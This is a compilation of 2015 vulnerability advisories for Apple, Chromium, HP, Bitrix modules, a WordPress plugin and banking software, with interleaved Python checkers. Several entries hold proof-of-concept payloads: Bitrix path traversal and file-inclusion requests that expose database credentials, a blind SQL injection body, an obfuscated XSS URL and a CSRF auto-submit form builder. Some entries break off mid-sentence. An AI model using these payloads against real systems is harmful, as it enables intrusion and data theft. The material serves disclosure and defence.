APPLE-SA-2015-12-08-4 watchOS 2.1
watchOS 2.1 is now available and addresses the following:

AppSandbox
Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes
Impact: A malicious application may maintain access to Contacts after having access revoked
Description: An issue existed in the sandbox's handling of hard links. This issue was addressed through improved hardening of the app sandbox.
CVE-ID
CVE-2015-7001 : Razvan Deaconescu and Mihai Bucicoiu of University POLITEHNICA of Bucharest; Luke Deshotels and William Enck of North Carolina State University; Lucas Vincenzo Davi and Ahmad-Reza Sadeghi of TU Darmstadt

Compression
Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes
Impact: Visiting a maliciously crafted website may lead to arbitrary code execution
Description: An uninitialized memory access issue existed in zlib. This issue was addressed through improved memory initialization and additional validation of zlib streams.
CVE-ID
CVE-2015-7054 : j00ru

CoreGraphics
Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes
Impact: Processing a maliciously crafted font file may lead to arbitrary code execution
Description: A memory corruption issue existed in the processing of font files. This issue was addressed through improved input validation.
CVE-ID
CVE-2015-7105 : John Villamil (@day6reak), Yahoo Pentest Team

CoreMedia Playback
Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes
Impact: Visiting a maliciously crafted website may lead to arbitrary code execution
Description: A memory corruption issue existed in the processing of malformed media files. This issue was addressed through improved memory handling.
CVE-ID
CVE-2015-7075

dyld
Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes
Impact: A malicious application may be able to execute arbitrary code with system privileges
Description: A segment validation issue existed in dyld. This was addressed through improved environment sanitization.
CVE-ID
CVE-2015-7072 : Apple

FontParser
Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes
Impact: Processing a maliciously crafted font file may lead to arbitrary code execution
Description: Multiple memory corruption issues existed in the processing of font files. These issues were addressed through improved bounds checking.
CVE-ID
CVE-2015-6978 : Jaanus Kp, Clarified Security, working with HP's Zero Day Initiative

GasGauge
Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes
Impact: A malicious application may be able to execute arbitrary code with system privileges
Description: A memory corruption issue existed in the kernel. This issue was addressed through improved memory handling.
CVE-ID
CVE-2015-6979 : PanguTeam

ImageIO
Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes
Impact: Processing a maliciously crafted image may lead to arbitrary code execution
Description: A memory corruption issue existed in ImageIO. This issue was addressed through improved memory handling.
CVE-ID
CVE-2015-7053 : Apple

IOHIDFamily
Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes
Impact: A malicious application may be able to execute arbitrary code with system privileges
Description: Multiple memory corruption issues existed in IOHIDFamily. These issues were addressed through improved memory handling.
CVE-ID
CVE-2015-7111 : beist and ABH of BoB
CVE-2015-7112 : Ian Beer of Google Project Zero

IOKit SCSI
Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes
Impact: A malicious application may be able to execute arbitrary code with kernel privileges
Description: A null pointer dereference existed in the handling of a certain userclient type. This issue was addressed through improved validation.
CVE-ID
CVE-2015-7068 : Ian Beer of Google Project Zero

Kernel
Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes
Impact: A local application may be able to cause a denial of service
Description: Multiple denial of service issues were addressed through improved memory handling.
CVE-ID
CVE-2015-7040 : Lufeng Li of Qihoo 360 Vulcan Team
CVE-2015-7041 : Lufeng Li of Qihoo 360 Vulcan Team
CVE-2015-7042 : Lufeng Li of Qihoo 360 Vulcan Team
CVE-2015-7043 : Tarjei Mandt (@kernelpool)

Kernel
Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes
Impact: A local user may be able to execute arbitrary code with kernel privileges
Description: An issue existed in the parsing of mach messages. This issue was addressed through improved validation of mach messages.
CVE-ID
CVE-2015-7047 : Ian Beer of Google
[SECURITY] [DSA 3415-1] chromium-browser security update
Debian Security Advisory DSA-3415-1                   secur...@debian.org
https://www.debian.org/security/                           Michael Gilbert
December 09, 2015                     https://www.debian.org/security/faq

Package        : chromium-browser
CVE ID         : CVE-2015-1302 CVE-2015-6764 CVE-2015-6765 CVE-2015-6766
                 CVE-2015-6767 CVE-2015-6768 CVE-2015-6769 CVE-2015-6770
                 CVE-2015-6771 CVE-2015-6772 CVE-2015-6773 CVE-2015-6774
                 CVE-2015-6775 CVE-2015-6776 CVE-2015-6777 CVE-2015-6778
                 CVE-2015-6779 CVE-2015-6780 CVE-2015-6781 CVE-2015-6782
                 CVE-2015-6784 CVE-2015-6785 CVE-2015-6786

Several vulnerabilities have been discovered in the chromium web browser.

CVE-2015-1302
    Rub Wu discovered an information leak in the pdfium library.

CVE-2015-6764
    Guang Gong discovered an out-of-bounds read issue in the v8 javascript library.

CVE-2015-6765
    A use-after-free issue was discovered in AppCache.

CVE-2015-6766
    A use-after-free issue was discovered in AppCache.

CVE-2015-6767
    A use-after-free issue was discovered in AppCache.

CVE-2015-6768
    Mariusz Mlynski discovered a way to bypass the Same Origin Policy.

CVE-2015-6769
    Mariusz Mlynski discovered a way to bypass the Same Origin Policy.

CVE-2015-6770
    Mariusz Mlynski discovered a way to bypass the Same Origin Policy.

CVE-2015-6771
    An out-of-bounds read issue was discovered in the v8 javascript library.

CVE-2015-6772
    Mariusz Mlynski discovered a way to bypass the Same Origin Policy.

CVE-2015-6773
    cloudfuzzer discovered an out-of-bounds read issue in the skia library.

CVE-2015-6774
    A use-after-free issue was found in extensions binding.

CVE-2015-6775
    Atte Kettunen discovered a type confusion issue in the pdfium library.

CVE-2015-6776
    Hanno Böck discovered an out-of-bounds access issue in the openjpeg library, which is used by pdfium.

CVE-2015-6777
    Long Liu found a use-after-free issue.

CVE-2015-6778
    Karl Skomski found an out-of-bounds read issue in the pdfium library.

CVE-2015-6779
    Til Jasper Ullrich discovered that the pdfium library does not sanitize "chrome:" URLs.

CVE-2015-6780
    Khalil Zhani discovered a use-after-free issue.

CVE-2015-6781
    miaubiz discovered an integer overflow issue in the sfntly library.

CVE-2015-6782
    Luan Herrera discovered a URL spoofing issue.

CVE-2015-6784
    Inti De Ceukelaire discovered a way to inject HTML into serialized web pages.

CVE-2015-6785
    Michael Ficarra discovered a way to bypass the Content Security Policy.

CVE-2015-6786
    Michael Ficarra discovered another way to bypass the Content Security Policy.

For the stable distribution (jessie), these problems have been fixed in version 47.0.2526.73-1~deb8u1.

For the testing distribution (stretch), these problems will be fixed soon.

For the unstable distribution (sid), these problems have been fixed in version 47.0.2526.73-1.

We recommend that you upgrade your chromium-browser packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
MacOS/iPhone/Apple Watch/Apple TV libc File System Buffer Overflow
Hi @ll,

Today Apple fixed a buffer overflow issue in libc/FTS (CVE-2015-7039).

Patch available for:
- OS X El Capitan v10.11 and v10.11.1
- iPhone 4s and later
- Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes
- Apple TV (4th generation)

Impact: Processing a maliciously crafted package may lead to arbitrary code execution
Description: Multiple buffer overflows existed in the C standard library. These issues were addressed through improved bounds

Conception and description of the issue here:
https://cxsecurity.com/issue/WLB-2015100149

Best Regards,
Maksymilian Arciemowicz (http://cert.cx)
https://cxsecurity.com - Independent Information
[CVE-2015-7706] SECURE DATA SPACE API Multiple Non-Persistent Cross-Site Scripting Vulnerabilities
secunet Security Networks AG
Security Advisory

Advisory: SECURE DATA SPACE API Multiple Non-Persistent Cross-Site Scripting Vulnerabilities

1. DETAILS

Product: SECURE DATA SPACE
Vendor URL: www.ssp-europe.eu
Type: Cross-site Scripting [CWE-79]
Date found: 2015-09-30
Date published: 2015-12-09
CVSSv2 Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CVE: CVE-2015-7706

2. AFFECTED VERSIONS

All product versions (Online, Dedicated, For Linux/Windows) in
Web-Client v3.1.1-2
restApiVersion: 3.5.7-FINAL
sdsServerVersion: 3.4.14-FINAL

3. INTRODUCTION

"The highly secure business solution for easy storage, synchronization, distribution and management of data - regardless of location or device" (from the vendor's homepage)

4. VULNERABILITY DETAILS

Secure Data Space version v3.1.1-2 is vulnerable to multiple unauthenticated non-persistent cross-site scripting vulnerabilities when user-supplied input is processed by the server.[0]

#1 Proof-of-Concept:
https://example.com/api/v3//public/shares/downloads/111"}

#2 Proof-of-Concept (authType parameter):
POST /api/v3/auth/login
[security bulletin] HPSBMU03520 rev.1 - HP Insight Control server provisioning, Remote Disclosure of Information
Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04918653

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04918653
Version: 1

HPSBMU03520 rev.1 - HP Insight Control server provisioning, Remote Disclosure of Information

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2015-12-09
Last Updated: 2015-12-09

Potential Security Impact: Remote disclosure of information

Source: Hewlett Packard Enterprise, Product Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Insight Control server provisioning that could be exploited remotely resulting in information disclosure.

References:
CVE-2015-6858
PSRT102928

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Insight Control server provisioning prior to v7.5.0
RabbitMQ

BACKGROUND

CVSS 2.0 Base Metrics
Reference       Base Vector                    Base Score
CVE-2015-6858   (AV:N/AC:M/Au:N/C:P/I:N/A:N)   4.3

Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

RESOLUTION
Hewlett Packard Enterprise has provided HP Insight Control server provisioning version 7.5.0 to resolve this vulnerability:
http://www.hp.com/go/insightupdates

HISTORY
Version:1 (rev.1) - 9 December 2015 Initial release

Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-al...@hpe.com.

Report: To report a potential security vulnerability with any HPE supported product, send Email to: security-al...@hpe.com

Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice

Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive

Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HPE General Software
HF = HPE Hardware and Firmware
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PV = ProCurve
ST = Storage Software
UX = HP-UX

Copyright 2015 Hewlett Packard Enterprise

Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
Path Traversal via CSRF in bitrix.xscan Bitrix Module
Advisory ID: HTB23278
Product: bitrix.xscan Bitrix module
Vendor: Bitrix
Vulnerable Version(s): 1.0.3 and probably prior
Tested Version: 1.0.3
Advisory Publication: November 18, 2015 [without technical details]
Vendor Notification: November 18, 2015
Vendor Patch: November 24, 2015
Public Disclosure: December 9, 2015
Vulnerability Type: Path Traversal [CWE-22]
CVE Reference: CVE-2015-8357
Risk Level: Medium
CVSSv3 Base Score: 4.2 [CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:L]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered a vulnerability in the bitrix.xscan Bitrix module, which is intended to discover and neutralize malware on the website. The vulnerability can be exploited to change the extension of arbitrary PHP files on the target system and gain access to potentially sensitive information, such as database credentials, or even make the whole website inaccessible.

The vulnerability exists due to absence of filtration of directory traversal characters (e.g. "../") passed via the "file" HTTP GET parameter to the "/bitrix/admin/bitrix.xscan_worker.php" script. A remote authenticated attacker can upload a file with malicious contents and pass this file to the vulnerable script along with the name of the file to rename. As a result, the vulnerable script will change the extension of the given file from ".php" to ".ph_". This makes the web server treat the file as a text file and display its contents instead of executing it.

To demonstrate the vulnerability follow the steps below:

1) Choose an arbitrary image file and modify it by appending the eval() PHP function at the end of the file. This is needed because the file will be renamed only if it contains potentially dangerous content.

2) Upload this file using standard CMS functionality, for example as an image for your profile.

3) Obtain the name of the image you have uploaded. You can do it using your profile. In our example the image had the following path: "/upload/main/77f/image.jpg".

4) Construct the exploit payload using the path to the image and the file you want to view. As a demonstration we chose to view the contents of the "/bitrix/.settings.php" file, since it contains database credentials:

file=/upload/main/77f/image.jpg../../../../../bitrix/.settings.php

5) Use the following PoC request to reproduce the vulnerability (the "action" and "file" GET parameters are those named above):

http://[host]/bitrix/admin/bitrix.xscan_worker.php?action=prison&file=/upload/main/77f/image.jpg../../../../../bitrix/.settings.php

As a result, the vulnerable script will rename "/bitrix/.settings.php" to "/bitrix/.settings.ph_", which makes it readable by anonymous users:

http://[host]/bitrix/.settings.ph_

Access to the vulnerable module requires administrative privileges; however, the vulnerability can be used by anonymous users via a CSRF vector. Steps 1-4 do not require administrative or special privileges and can be performed by any user who can register at the website or upload an image.

---

Solution:

Update to bitrix.xscan module 1.0.4

---

References:

[1] High-Tech Bridge Advisory HTB23278 - https://www.htbridge.com/advisory/HTB23278 - Path Traversal and CSRF in bitrix.xscan Bitrix Module
[2] bitrix.xscan - https://marketplace.1c-bitrix.ru/solutions/bitrix.xscan/ - Module for Bitrix CMS that can detect Trojans on your website.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
--- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
PHP File Inclusion in bitrix.mpbuilder Bitrix Module
Advisory ID: HTB23281
Product: bitrix.mpbuilder Bitrix module
Vendor: www.1c-bitrix.ru
Vulnerable Version(s): 1.0.10 and probably prior
Tested Version: 1.0.10
Advisory Publication: November 18, 2015 [without technical details]
Vendor Notification: November 18, 2015
Vendor Patch: November 25, 2015
Public Disclosure: December 9, 2015
Vulnerability Type: PHP File Inclusion [CWE-98]
CVE Reference: CVE-2015-8358
Risk Level: Critical
CVSSv3 Base Score: 9.6 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered a vulnerability in the bitrix.mpbuilder Bitrix module, which can be exploited to include and execute an arbitrary PHP file on the target system with the privileges of the web server. The attacker will be able to execute arbitrary system commands and gain complete control over the website. Access to the vulnerable module requires administrative privileges; however, the vulnerability can be used by anonymous users via a CSRF vector.

The vulnerability exists due to insufficient filtration of the "work[]" HTTP POST parameter in the "/bitrix/admin/bitrix.mpbuilder_step2.php" script before it is used in the include() PHP function. A remote attacker can include and execute an arbitrary local file on the target system.

A simple exploit is an HTML form (method "post", name "main") that submits the parameter work[]=/tmp/file to the following URL; it will include and execute the "/tmp/file" file:

http://[host]/bitrix/admin/bitrix.mpbuilder_step2.php?module_id=blog

In a real-world scenario an attacker can use session files to execute arbitrary PHP code. For example, an attacker can change the name in his profile to PHP code (the value is stored in the session file under the "NAME" key) and create a CSRF exploit that will pass arbitrary commands and execute them on the system.

The PoC below executes the /bin/ls command using a previously created session file with a malicious "NAME" value: the same form as above, with work[] pointing at the attacker's session file, submitted to

http://[host]/bitrix/admin/bitrix.mpbuilder_step2.php?module_id=blog

---

Solution:

Update to bitrix.mpbuilder module 1.0.12

---

References:

[1] High-Tech Bridge Advisory HTB23281 - https://www.htbridge.com/advisory/HTB23281 - PHP File Inclusion in bitrix.mpbuilder Bitrix module
[2] bitrix.mpbuilder - https://marketplace.1c-bitrix.ru/solutions/bitrix.mpbuilder/ - Bitrix module for software developers.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

---

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
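The two Bitrix advisories above (HTB23278 path traversal in the xscan "file" parameter, HTB23281 file inclusion through the mpbuilder "work[]" parameter) are the same defect seen twice: a user-controlled path is used without confining it to a directory. The following is an added example, not Bitrix code and not from the High-Tech Bridge advisories. It shows a naive prefix test that the traversal payload slips past, the canonicalise-then-check routine that refuses both payloads, and a builder for the auto-submitting form that both CSRF vectors rely on. The allowed directories (`/upload`, `/bitrix/modules`), extensions and function names are assumptions made for illustration; the payloads are quoted from the advisories.

```python
# Added example: not Bitrix code and not from the High-Tech Bridge advisories.
# Path confinement for user-supplied paths (the xscan "file" traversal and the
# mpbuilder "work[]" include), next to the naive prefix test the traversal
# payload slips past, plus the auto-submitting CSRF form both vectors use.
# The allowed directories, extensions and function names are assumptions.
import html
import posixpath
from typing import Optional, Tuple

UPLOAD_DIR = "/upload"           # assumed: where xscan may rename files
MODULE_DIR = "/bitrix/modules"   # assumed: where mpbuilder may include from

# Payloads quoted from the two advisories above
XSCAN_PAYLOAD = "/upload/main/77f/image.jpg../../../../../bitrix/.settings.php"
MPBUILDER_PAYLOAD = "/tmp/file"


def naive_check(user_path: str, allowed_dir: str) -> bool:
    """Illustrative vulnerable pattern: a bare prefix test ignores '..'
    segments, so the traversal payload is accepted."""
    return user_path.startswith(allowed_dir.rstrip("/") + "/")


def confined_path(user_path: str, allowed_dir: str,
                  exts: Tuple[str, ...]) -> Optional[str]:
    """Lexically canonicalise the web-relative path, then require that it
    still lies under allowed_dir and ends in an allowed extension.
    Returns the normalised path, or None when the request must be refused.
    normpath does not follow symlinks: once the path is mapped onto the
    filesystem, compare os.path.realpath() against the root as well."""
    if not user_path.startswith("/") or "\x00" in user_path:
        return None
    norm = posixpath.normpath(user_path)          # folds '.', '..' and '//'
    root = allowed_dir.rstrip("/") + "/"
    if not norm.startswith(root):
        return None
    if not norm.lower().endswith(tuple(e.lower() for e in exts)):
        return None
    return norm


def csrf_form(action_url: str, fields: dict) -> str:
    """Auto-submitting POST form of the kind both advisories describe: an
    admin who merely opens the page sends the request with their session."""
    inputs = "".join(
        f'<input type="hidden" name="{html.escape(k, quote=True)}" '
        f'value="{html.escape(v, quote=True)}">'
        for k, v in fields.items()
    )
    return (f'<form action="{html.escape(action_url, quote=True)}" '
            f'method="post" name="main">{inputs}</form>'
            f'<script>document.main.submit()</script>')


def demo() -> dict:
    """Run both advisory payloads and legitimate paths through the checks."""
    image_exts = (".jpg", ".png", ".php")
    return {
        "xscan_naive_accepts": naive_check(XSCAN_PAYLOAD, UPLOAD_DIR),
        "xscan_confined": confined_path(XSCAN_PAYLOAD, UPLOAD_DIR, image_exts),
        "xscan_legit": confined_path("/upload/main/77f/image.jpg", UPLOAD_DIR, image_exts),
        "mpbuilder_confined": confined_path(MPBUILDER_PAYLOAD, MODULE_DIR, (".php",)),
        # a PHP session file, the vector the advisory uses for code execution
        "mpbuilder_session": confined_path("/tmp/sess_abc123", MODULE_DIR, (".php",)),
        "mpbuilder_legit": confined_path("/bitrix/modules/blog/include.php", MODULE_DIR, (".php",)),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
    print(csrf_form("http://[host]/bitrix/admin/bitrix.mpbuilder_step2.php?module_id=blog",
                    {"work[]": "/tmp/file"}))
```

The traversal payload normalises to `/bitrix/.settings.php`, so the prefix check fails after canonicalisation even though the raw string begins with `/upload/`. An allowlist of known module names would be stricter still for the include case; the directory-plus-extension rule is the minimum that keeps `/tmp/sess_*` out of include().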
WordPress Users Ultra Plugin [Blind SQL injection] - Update
* Exploit Title: WordPress Users Ultra Plugin [Blind SQL injection]
* Discovery Date: 2015/10/19
* Public Disclosure Date: 2015/12/01
* Exploit Author: Panagiotis Vagenas
* Contact: https://twitter.com/panVagenas
* Vendor Homepage: http://usersultra.com
* Software Link: https://wordpress.org/plugins/users-ultra/
* Version: 1.5.50
* Tested on: WordPress 4.3.1
* Category: webapps

Description

One can perform an SQL injection attack simply by exploiting the following WP ajax actions:

1. `edit_video`
2. `delete_photo`
3. `delete_gallery`
4. `delete_video`
5. `reload_photos`
6. `edit_gallery`
7. `edit_gallery_confirm`
8. `edit_photo`
9. `edit_photo_confirm`
10. `edit_video_confirm`
11. `set_as_main_photo`
12. `sort_photo_list`
13. `sort_gallery_list`
14. `reload_videos`

POST parameters that are exploitable in each action respectively:

1. `video_id`
2. `photo_id`
3. `gal_id`
4. `video_id`
5. `gal_id`
6. `gal_id`
7. `gal_id`
8. `photo_id`
9. `photo_id`
10. `video_id`
11. `photo_id`, `gal_id`
12. `order`
13. `order`
14. `video_id`

In case #7 a user can also change the gallery name, description and visibility by setting the POST parameters `gal_name`, `gal_desc` and `gal_visibility` respectively.

In case #8 `photo_id` is first cast to integer and a query to the DB is performed. If results are returned, then for each result a new query is performed without casting `photo_id` to integer. So if an attacker knows a valid photo id, the attack can be performed in the second query. This is achievable because

In case #9 a user can also change the photo name, description, tags and category by setting the POST parameters `photo_name`, `photo_desc`, `photo_tags` and `photo_category` respectively.

In case #10 a user can also change the video name, unique id and type by setting the POST parameters `video_name`, `video_unique_id` and `video_type` respectively.

Because the functions wpdb::get_results() and wpdb::query() are in use here, only one SQL statement can be made per request. This keeps the severity of the attack low. In addition, all actions are privileged, so the user must have an active account on the vulnerable website in order to perform the attack.

PoC

Send a POST request to `http://my.vulnerable.website.com/wp-admin/admin-ajax.php` with data (the `action` and `video_id` parameters named above):

`action=edit_video&video_id=1 and sleep(5)`

Timeline

2015/10/29 - Vendor notified via email
2015/11/11 - Vendor notified via contact form in his website
2015/11/13 - Vendor notified via support forums at wordpress.org
2015/11/14 - Vendor responded and received report through email
2015/12/08 - Vendor provided new version 1.5.63 which resolves issues

Solution

Upgrade to version 1.5.63
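The action/parameter table in the advisory above is already the specification a request checker needs: every listed parameter is an identifier, so any value that is not a plain integer is either broken input or an injection probe. The following is an added example, not code from the advisory or from the Users Ultra plugin. It encodes that table and flags admin-ajax.php POST bodies whose injectable parameters fail the integer rule, mirroring the casting a fixed plugin would apply server-side. The format of the `order` parameters (assumed to be comma-separated integers) and the sample bodies are constructed for this example; the first sample body is the advisory's own PoC.

```python
# Added example, not code from the advisory or from the Users Ultra plugin.
# Checker for admin-ajax.php POST bodies built from the action/parameter
# table above: every injectable parameter must be an integer (the 'order'
# parameters are assumed to be comma-separated integers). Sample bodies are
# constructed; the first is the advisory's PoC.
import re
from urllib.parse import parse_qs

# action -> injectable POST parameters, as listed in the advisory
INJECTABLE = {
    "edit_video": ("video_id",),
    "delete_photo": ("photo_id",),
    "delete_gallery": ("gal_id",),
    "delete_video": ("video_id",),
    "reload_photos": ("gal_id",),
    "edit_gallery": ("gal_id",),
    "edit_gallery_confirm": ("gal_id",),
    "edit_photo": ("photo_id",),
    "edit_photo_confirm": ("photo_id",),
    "edit_video_confirm": ("video_id",),
    "set_as_main_photo": ("photo_id", "gal_id"),
    "sort_photo_list": ("order",),
    "sort_gallery_list": ("order",),
    "reload_videos": ("video_id",),
}

INT_LIST = re.compile(r"\d+(,\d+)*")   # '7' or '3,1,2'; nothing else


def suspicious_params(body: str) -> list:
    """Return the (name, value) pairs in one urlencoded POST body that a
    sanitised plugin would have rejected. An empty list means the request
    is clean or targets an action that is not in the table."""
    fields = parse_qs(body, keep_blank_values=True)
    action = fields.get("action", [""])[0]
    hits = []
    for name in INJECTABLE.get(action, ()):
        for value in fields.get(name, []):
            if INT_LIST.fullmatch(value.strip()) is None:
                hits.append((name, value))
    return hits


# Constructed sample traffic; the first line is the advisory's own PoC body.
SAMPLE_BODIES = [
    "action=edit_video&video_id=1 and sleep(5)",
    "action=set_as_main_photo&photo_id=7&gal_id=3",
    "action=sort_photo_list&order=3,1,2",
    "action=sort_photo_list&order=1) and sleep(5)--",
    # case #8: the first query casts photo_id, the second does not, so a
    # value that still casts to 12 reaches the raw query unchanged
    "action=edit_photo&photo_id=12 and sleep(5)",
    "action=edit_photo_confirm&photo_id=12&photo_name=holiday",
]


def scan(bodies) -> list:
    """Return (body, hits) for every body that carries a non-integer value."""
    flagged = []
    for body in bodies:
        hits = suspicious_params(body)
        if hits:
            flagged.append((body, hits))
    return flagged


if __name__ == "__main__":
    for body, hits in scan(SAMPLE_BODIES):
        print(body, "->", hits)
```

Run against proxy or access logs, the same rule separates time-based probes such as `sleep(5)` from ordinary gallery operations without needing a signature for every SQL keyword. The `edit_photo` case is worth noting: casting the value once does not help when a later query reuses the raw string, so the check belongs at the point where the value is bound into each statement.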
XSS vulnerability in Intellect Core banking software - Polaris
[+] Credits: Mayank Sahu
[+] Email: ms...@controlcase.com

Vendor: Intellect Design Arena (Polaris)

Product:
Intellect Core banking software (Armar module)

Vulnerability Type:
Cross site scripting - XSS

CVE Reference:
CVE-2015-6540

Vulnerability Details:
The application allows arbitrary client-side JS code execution on victims who click a crafted link. Session ID and data theft may follow, as well as the possibility to bypass CSRF protections, inject iframes to establish communication channels, etc. The vulnerability exists after login into the application.

XSS Exploit code(s):
http://Server-address:7001/AAL/LoginAfter.jsp?page=Logout.jsp%27|[window[%27location%27]%3D%27\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3a\x61\x6c\x65\x72\x74\x28\x27\x43\x43\x27\x29%27]%2B%27

Disclosure Timeline:
Vendor Notification: September 21, 2015
December 09, 2015 : Public Disclosure

Exploitation Technique:
Remote

Severity Level:
High

Description:
Request Method(s): [+] GET
Vulnerable Product: [+] Intellect Core banking solution (Armor)
Vulnerable Parameter(s): [+] page

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.

by Mayank Sahu
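The exploit URL above hides its intent behind two encoding layers: percent-encoding for the quotes and operators, and JavaScript `\xHH` escapes for the string that is assigned to `window.location`. The following is an added example, not from the advisory or the vendor. It peels those layers off the `page` value so the effective payload can be read, and it is written generically (percent-encoding, `\xHH`/`\uHHHH` escapes and HTML character references are decoded in turn until nothing changes), so it also handles payloads stacked deeper than this one. The only input is the `page` value quoted from the PoC URL.

```python
# Added example (not from the advisory): de-obfuscate the Intellect 'page'
# payload to see what the browser executes. Generic: URL percent-encoding,
# JavaScript \xHH / \uHHHH escapes and HTML character references are decoded
# round after round until the string is stable.
import html
import re
from urllib.parse import unquote

# The value of the 'page' parameter from the PoC URL above (raw string, so
# the backslashes are the literal \x sequences sent to the server).
PAYLOAD = (r"Logout.jsp%27|[window[%27location%27]%3D%27"
           r"\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3a"
           r"\x61\x6c\x65\x72\x74\x28\x27\x43\x43\x27\x29%27]%2B%27")

JS_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})")


def js_unescape(s: str) -> str:
    """Resolve JavaScript \\xHH and \\uHHHH escapes to the characters they denote."""
    return JS_ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def deobfuscate(payload: str, max_rounds: int = 8) -> list:
    """Return every intermediate stage, payload first, fully decoded last.
    Each round applies URL-, then JS-, then HTML-decoding; it stops when a
    round changes nothing or when max_rounds is reached (a guard against
    input that keeps producing new escapes)."""
    stages = [payload]
    for _ in range(max_rounds):
        step = html.unescape(js_unescape(unquote(stages[-1])))
        if step == stages[-1]:
            break
        stages.append(step)
    return stages


def injected_scheme(decoded: str) -> bool:
    """True when the decoded value carries a javascript: URL, i.e. the payload
    aims to run script by steering window.location to it. Whitespace is
    removed first because browsers tolerate it inside the scheme."""
    compact = re.sub(r"\s+", "", decoded.lower())
    return "javascript:" in compact


if __name__ == "__main__":
    for depth, stage in enumerate(deobfuscate(PAYLOAD)):
        print(f"layer {depth}: {stage}")
    print("javascript: URL present:", injected_scheme(deobfuscate(PAYLOAD)[-1]))
```

Decoded, the value reads `Logout.jsp'|[window['location']='javascript:alert('CC')']+'`: the leading quote and trailing `+'` are shaped to close and reopen a single-quoted JavaScript string, which is why the payload works in a page that writes the `page` parameter into script rather than into HTML. Output encoding for the JavaScript string context (or not reflecting `page` into script at all) is the corresponding fix.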
Advisory: Arro and Other Android Taxi Hailing Apps Did Not Use SSL (Mobile Knowledge)
